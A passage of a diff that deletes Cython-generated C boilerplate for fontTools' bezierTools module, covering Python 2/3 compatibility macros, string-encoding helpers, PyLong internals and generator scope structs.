&PyByteArray_Type) - #endif - #if !defined(PyObject_Format) - #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) - #endif -#endif -#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) -#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? 
PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) -#if PY_MAJOR_VERSION >= 3 - #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) -#else - #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) -#endif -#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) - #define PyObject_ASCII(o) PyObject_Repr(o) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyBaseString_Type PyUnicode_Type - #define PyStringObject PyUnicodeObject - #define PyString_Type PyUnicode_Type - #define PyString_Check PyUnicode_Check - #define PyString_CheckExact PyUnicode_CheckExact -#ifndef PyObject_Unicode - #define PyObject_Unicode PyObject_Str -#endif -#endif -#if PY_MAJOR_VERSION >= 3 - #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) - #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) -#else - #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) - #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) -#endif -#if CYTHON_COMPILING_IN_CPYTHON - #define __Pyx_PySequence_ListKeepNew(obj)\ - (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? 
__Pyx_NewRef(obj) : PySequence_List(obj)) -#else - #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) -#endif -#ifndef PySet_CheckExact - #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) -#endif -#if PY_VERSION_HEX >= 0x030900A4 - #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) - #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) -#else - #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) - #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) -#endif -#if CYTHON_ASSUME_SAFE_MACROS - #define __Pyx_PySequence_ITEM(o, i) PySequence_ITEM(o, i) - #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) - #define __Pyx_PyTuple_SET_ITEM(o, i, v) (PyTuple_SET_ITEM(o, i, v), (0)) - #define __Pyx_PyList_SET_ITEM(o, i, v) (PyList_SET_ITEM(o, i, v), (0)) - #define __Pyx_PyTuple_GET_SIZE(o) PyTuple_GET_SIZE(o) - #define __Pyx_PyList_GET_SIZE(o) PyList_GET_SIZE(o) - #define __Pyx_PySet_GET_SIZE(o) PySet_GET_SIZE(o) - #define __Pyx_PyBytes_GET_SIZE(o) PyBytes_GET_SIZE(o) - #define __Pyx_PyByteArray_GET_SIZE(o) PyByteArray_GET_SIZE(o) -#else - #define __Pyx_PySequence_ITEM(o, i) PySequence_GetItem(o, i) - #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) - #define __Pyx_PyTuple_SET_ITEM(o, i, v) PyTuple_SetItem(o, i, v) - #define __Pyx_PyList_SET_ITEM(o, i, v) PyList_SetItem(o, i, v) - #define __Pyx_PyTuple_GET_SIZE(o) PyTuple_Size(o) - #define __Pyx_PyList_GET_SIZE(o) PyList_Size(o) - #define __Pyx_PySet_GET_SIZE(o) PySet_Size(o) - #define __Pyx_PyBytes_GET_SIZE(o) PyBytes_Size(o) - #define __Pyx_PyByteArray_GET_SIZE(o) PyByteArray_Size(o) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyIntObject PyLongObject - #define PyInt_Type PyLong_Type - #define PyInt_Check(op) PyLong_Check(op) - #define PyInt_CheckExact(op) PyLong_CheckExact(op) - #define __Pyx_Py3Int_Check(op) PyLong_Check(op) - #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) - #define PyInt_FromString PyLong_FromString - #define PyInt_FromUnicode 
PyLong_FromUnicode - #define PyInt_FromLong PyLong_FromLong - #define PyInt_FromSize_t PyLong_FromSize_t - #define PyInt_FromSsize_t PyLong_FromSsize_t - #define PyInt_AsLong PyLong_AsLong - #define PyInt_AS_LONG PyLong_AS_LONG - #define PyInt_AsSsize_t PyLong_AsSsize_t - #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask - #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask - #define PyNumber_Int PyNumber_Long -#else - #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) - #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyBoolObject PyLongObject -#endif -#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY - #ifndef PyUnicode_InternFromString - #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) - #endif -#endif -#if PY_VERSION_HEX < 0x030200A4 - typedef long Py_hash_t; - #define __Pyx_PyInt_FromHash_t PyInt_FromLong - #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t -#else - #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t - #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t -#endif -#if CYTHON_USE_ASYNC_SLOTS - #if PY_VERSION_HEX >= 0x030500B1 - #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods - #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) - #else - #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) - #endif -#else - #define __Pyx_PyType_AsAsync(obj) NULL -#endif -#ifndef __Pyx_PyAsyncMethodsStruct - typedef struct { - unaryfunc am_await; - unaryfunc am_aiter; - unaryfunc am_anext; - } __Pyx_PyAsyncMethodsStruct; -#endif - -#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) - #if !defined(_USE_MATH_DEFINES) - #define _USE_MATH_DEFINES - #endif -#endif -#include <math.h> -#ifdef NAN -#define __PYX_NAN() ((float) NAN) -#else -static CYTHON_INLINE float __PYX_NAN() { - float value; - memset(&value, 0xFF, sizeof(value)); - return value; -} -#endif -#if defined(__CYGWIN__)
&& defined(_LDBL_EQ_DBL) -#define __Pyx_truncl trunc -#else -#define __Pyx_truncl truncl -#endif - -#define __PYX_MARK_ERR_POS(f_index, lineno) \ - { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } -#define __PYX_ERR(f_index, lineno, Ln_error) \ - { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } - -#ifdef CYTHON_EXTERN_C - #undef __PYX_EXTERN_C - #define __PYX_EXTERN_C CYTHON_EXTERN_C -#elif defined(__PYX_EXTERN_C) - #ifdef _MSC_VER - #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") - #else - #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. - #endif -#else - #ifdef __cplusplus - #define __PYX_EXTERN_C extern "C" - #else - #define __PYX_EXTERN_C extern - #endif -#endif - -#define __PYX_HAVE__fontTools__misc__bezierTools -#define __PYX_HAVE_API__fontTools__misc__bezierTools -/* Early includes */ -#ifdef _OPENMP -#include <omp.h> -#endif /* _OPENMP */ - -#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) -#define CYTHON_WITHOUT_ASSERTIONS -#endif - -typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; - const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; - -#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 -#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 -#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) -#define __PYX_DEFAULT_STRING_ENCODING "" -#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString -#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize -#define __Pyx_uchar_cast(c) ((unsigned char)c) -#define __Pyx_long_cast(x) ((long)x) -#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ - (sizeof(type) < sizeof(Py_ssize_t)) ||\ - (sizeof(type) > sizeof(Py_ssize_t) &&\ - likely(v
< (type)PY_SSIZE_T_MAX ||\ - v == (type)PY_SSIZE_T_MAX) &&\ - (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ - v == (type)PY_SSIZE_T_MIN))) ||\ - (sizeof(type) == sizeof(Py_ssize_t) &&\ - (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ - v == (type)PY_SSIZE_T_MAX))) ) -static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { - return (size_t) i < (size_t) limit; -} -#if defined (__cplusplus) && __cplusplus >= 201103L - #include <cstdlib> - #define __Pyx_sst_abs(value) std::abs(value) -#elif SIZEOF_INT >= SIZEOF_SIZE_T - #define __Pyx_sst_abs(value) abs(value) -#elif SIZEOF_LONG >= SIZEOF_SIZE_T - #define __Pyx_sst_abs(value) labs(value) -#elif defined (_MSC_VER) - #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) -#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define __Pyx_sst_abs(value) llabs(value) -#elif defined (__GNUC__) - #define __Pyx_sst_abs(value) __builtin_llabs(value) -#else - #define __Pyx_sst_abs(value) ((value<0) ? -value : value) -#endif -static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); -static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); -static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); -static CYTHON_INLINE PyObject* __Pyx_PyByteArray_FromString(const char*); -#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) -#define __Pyx_PyBytes_FromString PyBytes_FromString -#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize -static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); -#if PY_MAJOR_VERSION < 3 - #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString - #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize -#else - #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString - #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize -#endif -#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s))
-#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) -#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) -#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) -#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) -#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) -{ - const wchar_t *u_end = u; - while (*u_end++) ; - return (size_t)(u_end - u - 1); -} -#else -static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) -{ - const Py_UNICODE *u_end = u; - while (*u_end++) ; - return (size_t)(u_end - u - 1); -} -#endif -#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) -#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) -#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode -#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode -#define __Pyx_NewRef(obj) 
(Py_INCREF(obj), obj) -#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) -static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); -static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); -static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); -static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); -#define __Pyx_PySequence_Tuple(obj)\ - (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) -static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); -static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); -static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); -#if CYTHON_ASSUME_SAFE_MACROS -#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) -#else -#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) -#endif -#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) -#if PY_MAJOR_VERSION >= 3 -#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) -#else -#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? 
__Pyx_NewRef(x) : PyNumber_Int(x)) -#endif -#if CYTHON_USE_PYLONG_INTERNALS - #if PY_VERSION_HEX >= 0x030C00A7 - #ifndef _PyLong_SIGN_MASK - #define _PyLong_SIGN_MASK 3 - #endif - #ifndef _PyLong_NON_SIZE_BITS - #define _PyLong_NON_SIZE_BITS 3 - #endif - #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) - #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) - #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) - #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) - #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) - #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) - #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) - #define __Pyx_PyLong_SignedDigitCount(x)\ - ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) - #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) - #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) - #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) - #else - #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) - #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) - #endif - typedef Py_ssize_t __Pyx_compact_pylong; - typedef size_t __Pyx_compact_upylong; - #else // Py < 3.12 - #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) - #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) - #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) - #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) - #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 
0 : __Pyx_PyLong_Digits(x)[0]) - #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) - #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) - #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) - #define __Pyx_PyLong_CompactValue(x)\ - ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) - typedef sdigit __Pyx_compact_pylong; - typedef digit __Pyx_compact_upylong; - #endif - #if PY_VERSION_HEX >= 0x030C00A5 - #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) - #else - #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) - #endif -#endif -#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII -#include -static int __Pyx_sys_getdefaultencoding_not_ascii; -static int __Pyx_init_sys_getdefaultencoding_params(void) { - PyObject* sys; - PyObject* default_encoding = NULL; - PyObject* ascii_chars_u = NULL; - PyObject* ascii_chars_b = NULL; - const char* default_encoding_c; - sys = PyImport_ImportModule("sys"); - if (!sys) goto bad; - default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); - Py_DECREF(sys); - if (!default_encoding) goto bad; - default_encoding_c = PyBytes_AsString(default_encoding); - if (!default_encoding_c) goto bad; - if (strcmp(default_encoding_c, "ascii") == 0) { - __Pyx_sys_getdefaultencoding_not_ascii = 0; - } else { - char ascii_chars[128]; - int c; - for (c = 0; c < 128; c++) { - ascii_chars[c] = (char) c; - } - __Pyx_sys_getdefaultencoding_not_ascii = 1; - ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); - if (!ascii_chars_u) goto bad; - ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); - if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { - PyErr_Format( - PyExc_ValueError, - "This module compiled with c_string_encoding=ascii, but default 
encoding '%.200s' is not a superset of ascii.", - default_encoding_c); - goto bad; - } - Py_DECREF(ascii_chars_u); - Py_DECREF(ascii_chars_b); - } - Py_DECREF(default_encoding); - return 0; -bad: - Py_XDECREF(default_encoding); - Py_XDECREF(ascii_chars_u); - Py_XDECREF(ascii_chars_b); - return -1; -} -#endif -#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 -#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) -#else -#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) -#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT -#include <string.h> -static char* __PYX_DEFAULT_STRING_ENCODING; -static int __Pyx_init_sys_getdefaultencoding_params(void) { - PyObject* sys; - PyObject* default_encoding = NULL; - char* default_encoding_c; - sys = PyImport_ImportModule("sys"); - if (!sys) goto bad; - default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); - Py_DECREF(sys); - if (!default_encoding) goto bad; - default_encoding_c = PyBytes_AsString(default_encoding); - if (!default_encoding_c) goto bad; - __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); - if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; - strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); - Py_DECREF(default_encoding); - return 0; -bad: - Py_XDECREF(default_encoding); - return -1; -} -#endif -#endif - - -/* Test for GCC > 2.95 */ -#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) - #define likely(x) __builtin_expect(!!(x), 1) - #define unlikely(x) __builtin_expect(!!(x), 0) -#else /* !__GNUC__ or GCC < 2.95 */ - #define likely(x) (x) - #define unlikely(x) (x) -#endif /* __GNUC__ */ -static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } - -#if !CYTHON_USE_MODULE_STATE -static PyObject *__pyx_m = NULL; -#endif -static int __pyx_lineno; -static int __pyx_clineno = 0; 
-static const char * __pyx_cfilenm = __FILE__; -static const char *__pyx_filename; - -/* Header.proto */ -#if !defined(CYTHON_CCOMPLEX) - #if defined(__cplusplus) - #define CYTHON_CCOMPLEX 1 - #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) - #define CYTHON_CCOMPLEX 1 - #else - #define CYTHON_CCOMPLEX 0 - #endif -#endif -#if CYTHON_CCOMPLEX - #ifdef __cplusplus - #include <complex> - #else - #include <complex.h> - #endif -#endif -#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) - #undef _Complex_I - #define _Complex_I 1.0fj -#endif - -/* #### Code section: filename_table ### */ - -static const char *__pyx_f[] = { - "Lib/fontTools/misc/bezierTools.py", -}; -/* #### Code section: utility_code_proto_before_types ### */ -/* ForceInitThreads.proto */ -#ifndef __PYX_FORCE_INIT_THREADS - #define __PYX_FORCE_INIT_THREADS 0 -#endif - -/* #### Code section: numeric_typedefs ### */ -/* #### Code section: complex_type_declarations ### */ -/* Declarations.proto */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #ifdef __cplusplus - typedef ::std::complex< double > __pyx_t_double_complex; - #else - typedef double _Complex __pyx_t_double_complex; - #endif -#else - typedef struct { double real, imag; } __pyx_t_double_complex; -#endif -static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); - -/* #### Code section: type_declarations ### */ - -/*--- Type declarations ---*/ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; -struct 
__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; -struct __pyx_defaults; -typedef struct __pyx_defaults __pyx_defaults; -struct __pyx_defaults { - PyObject *__pyx_arg_sqrt; -}; - -/* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_t; -}; - - -/* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_t; -}; - - -/* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC { - PyObject_HEAD - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - PyObject *__pyx_v_ts; -}; - - -/* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC { - PyObject_HEAD - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex 
__pyx_v_a1; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_b1; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_c1; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_d1; - double __pyx_v_delta; - double __pyx_v_delta_2; - double __pyx_v_delta_3; - PyObject *__pyx_v_i; - PyObject *__pyx_v_pt1; - PyObject *__pyx_v_pt2; - PyObject *__pyx_v_pt3; - PyObject *__pyx_v_pt4; - double __pyx_v_t1; - double __pyx_v_t1_2; - double __pyx_v_t1_3; - double __pyx_v_t2; - PyObject *__pyx_v_ts; - PyObject *__pyx_t_0; - Py_ssize_t __pyx_t_1; - PyObject *(*__pyx_t_2)(PyObject *); -}; - - -/* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_i; -}; - - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t { - PyObject_HEAD - PyObject *__pyx_v_precision; -}; - - -/* "fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_x; -}; - -/* #### Code section: utility_code_proto ### */ - -/* --- Runtime support code (head) --- */ -/* Refnanny.proto */ -#ifndef CYTHON_REFNANNY - #define CYTHON_REFNANNY 0 -#endif -#if CYTHON_REFNANNY - typedef struct { - void (*INCREF)(void*, PyObject*, Py_ssize_t); - void (*DECREF)(void*, PyObject*, Py_ssize_t); - void (*GOTREF)(void*, PyObject*, Py_ssize_t); - 
void (*GIVEREF)(void*, PyObject*, Py_ssize_t); - void* (*SetupContext)(const char*, Py_ssize_t, const char*); - void (*FinishContext)(void**); - } __Pyx_RefNannyAPIStruct; - static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; - static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); - #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; -#ifdef WITH_THREAD - #define __Pyx_RefNannySetupContext(name, acquire_gil)\ - if (acquire_gil) {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ - PyGILState_Release(__pyx_gilstate_save);\ - } else {\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ - } - #define __Pyx_RefNannyFinishContextNogil() {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - __Pyx_RefNannyFinishContext();\ - PyGILState_Release(__pyx_gilstate_save);\ - } -#else - #define __Pyx_RefNannySetupContext(name, acquire_gil)\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) - #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() -#endif - #define __Pyx_RefNannyFinishContextNogil() {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - 